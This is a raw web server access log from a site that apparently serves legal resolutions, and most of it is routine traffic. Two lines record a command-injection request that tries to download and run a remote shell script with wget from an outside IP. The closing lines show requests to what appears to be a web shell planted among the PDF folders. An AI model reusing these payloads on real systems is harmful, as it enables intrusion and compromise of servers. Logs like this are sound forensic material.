172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [15/Mar/2024:01:15:38 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [15/Mar/2024:01:15:39 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
201.245.192.253 - - [15/Mar/2024:01:15:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:15:58 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2024&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:03 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2023&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:04 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2023&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:12 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2021&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:18 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2021&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:20 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2021&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
201.245.192.253 - - [15/Mar/2024:01:16:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:16:24 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2020&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:27 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2020&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:27 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2020&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:28 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2020&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:28 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2020&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:32 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:41 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2018&resuelve=comit%E9%20de%20predios HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:16:57 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2013&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:02 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2014&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:08 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2015&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2015&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:14 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2016&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2016&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:23 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2017&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:30 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2017&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:30 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2018&resuelve=comit%E9 HTTP/1.1" 200 626
188.165.87.110 - - [15/Mar/2024:01:17:35 -0500] "GET /portaldeninos/xmlrpc.php HTTP/1.1" 405 42
201.245.192.253 - - [15/Mar/2024:01:17:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:17:45 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2018&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:48 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:56 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:56 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:57 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:57 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:58 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:17:59 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2019&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:18:03 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2020&resuelve=comit%E9 HTTP/1.1" 200 626
172.22.2.4 - - [15/Mar/2024:01:18:06 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
201.245.192.253 - - [15/Mar/2024:01:18:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [15/Mar/2024:01:18:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Mar/2024:23:39:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [14/Mar/2024:23:39:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:19:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:18:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Mar/2024:23:39:56 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
172.22.2.4 - - [15/Mar/2024:01:20:04 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3667&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 1384
172.22.2.4 - - [15/Mar/2024:01:20:05 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [15/Mar/2024:01:20:14 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [15/Mar/2024:01:20:14 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
201.245.192.253 - - [15/Mar/2024:01:20:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:18:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
168.119.48.175 - - [15/Mar/2024:01:20:39 -0500] "GET / HTTP/1.1" 200 4720
186.102.59.197 - - [15/Mar/2024:01:20:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3667.pdf HTTP/1.1" 200 333450
106.227.49.113 - - [15/Mar/2024:01:21:03 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [14/Mar/2024:23:41:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:21:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [14/Mar/2024:23:41:56 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:22:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:23:32 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1166&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1221
186.102.59.197 - - [15/Mar/2024:01:23:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1166.pdf HTTP/1.1" 200 221240
216.245.221.92 - - [15/Mar/2024:01:23:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:01:23:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [14/Mar/2024:23:44:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:01:24:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
139.162.237.140 - - [15/Mar/2024:01:25:11 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
172.22.2.4 - - [15/Mar/2024:01:24:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [15/Mar/2024:01:23:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:01:25:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:26:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:24:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
201.245.192.253 - - [15/Mar/2024:01:27:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:28:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [15/Mar/2024:01:28:38 -0500] "HEAD / HTTP/1.1" 200 -
188.165.87.111 - - [15/Mar/2024:01:28:56 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
84.17.52.153 - - [15/Mar/2024:01:29:12 -0500] "GET /modules/mod_rebug/manifest.xml HTTP/1.1" 404 1022
201.245.192.253 - - [14/Mar/2024:23:49:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
152.61.128.50 - - [15/Mar/2024:01:29:18 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [15/Mar/2024:01:29:19 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [15/Mar/2024:01:29:20 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [15/Mar/2024:01:29:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:30:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:29:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Mar/2024:01:29:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:01:31:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:30:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48425
172.22.2.4 - - [15/Mar/2024:01:30:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48425
201.245.192.253 - - [15/Mar/2024:01:32:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.132 - - [15/Mar/2024:01:33:07 -0500] "GET /Publicaciones/2023EE282768.pdf HTTP/1.1" 404 228
216.245.221.92 - - [15/Mar/2024:01:33:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:01:33:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [14/Mar/2024:23:54:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:01:34:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:03:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:00:39:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:08:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:01:28:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:01:29:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:00:38:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:00:43:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:00:41:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:21:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:13:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:00:41:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:31:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:31:56 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:18:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:01:29:56 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:19:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:19:56 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:00:48:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:01:33:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:01:21:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:00:53:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:01:23:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:00:58:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:00:39:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:35:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:36:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [15/Mar/2024:01:37:01 -0500] "GET /isolucionsda/ControlDeInicio.asp HTTP/1.1" 404 3578
172.22.2.4 - - [15/Mar/2024:01:35:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:01:37:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:36:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
201.245.192.253 - - [15/Mar/2024:01:38:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.39 - - [15/Mar/2024:01:38:32 -0500] "GET /inscribete-y-participa-en-la-convencion-internacional-de-emergencia-climatica-bogota-2023.html HTTP/1.1" 304 -
216.245.221.92 - - [15/Mar/2024:01:38:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:01:38:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
216.244.66.195 - - [15/Mar/2024:01:38:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/01430.pdf HTTP/1.1" 200 327101
201.245.192.253 - - [14/Mar/2024:23:59:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
178.79.163.26 - - [15/Mar/2024:01:39:15 -0500] "GET / HTTP/1.1" 200 319
178.79.163.26 - - [15/Mar/2024:01:39:16 -0500] "\x16\x03\x01" 400 226
178.79.163.26 - - [15/Mar/2024:01:39:17 -0500] "\x16\x03\x01" 400 226
178.79.163.26 - - [15/Mar/2024:01:39:17 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [15/Mar/2024:01:39:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [15/Mar/2024:01:39:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:39:56 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [15/Mar/2024:01:39:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37167
201.245.192.253 - - [15/Mar/2024:01:39:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37496
201.245.192.253 - - [15/Mar/2024:01:40:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35618
172.22.2.4 - - [15/Mar/2024:01:40:09 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=452&usuario=&sector=&fecha=2014&resuelve= HTTP/1.1" 200 2507
172.22.2.4 - - [15/Mar/2024:01:40:10 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
186.102.59.197 - - [15/Mar/2024:01:40:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0452.pdf HTTP/1.1" 200 479321
201.245.192.253 - - [15/Mar/2024:01:40:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.119.128 - - [15/Mar/2024:01:40:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3923.pdf HTTP/1.1" 200 2902
47.128.122.210 - - [15/Mar/2024:01:41:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0703.pdf&ft=edit HTTP/1.1" 200 3106
47.128.122.210 - - [15/Mar/2024:01:41:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.122.210 - - [15/Mar/2024:01:41:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.122.210 - - [15/Mar/2024:01:41:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
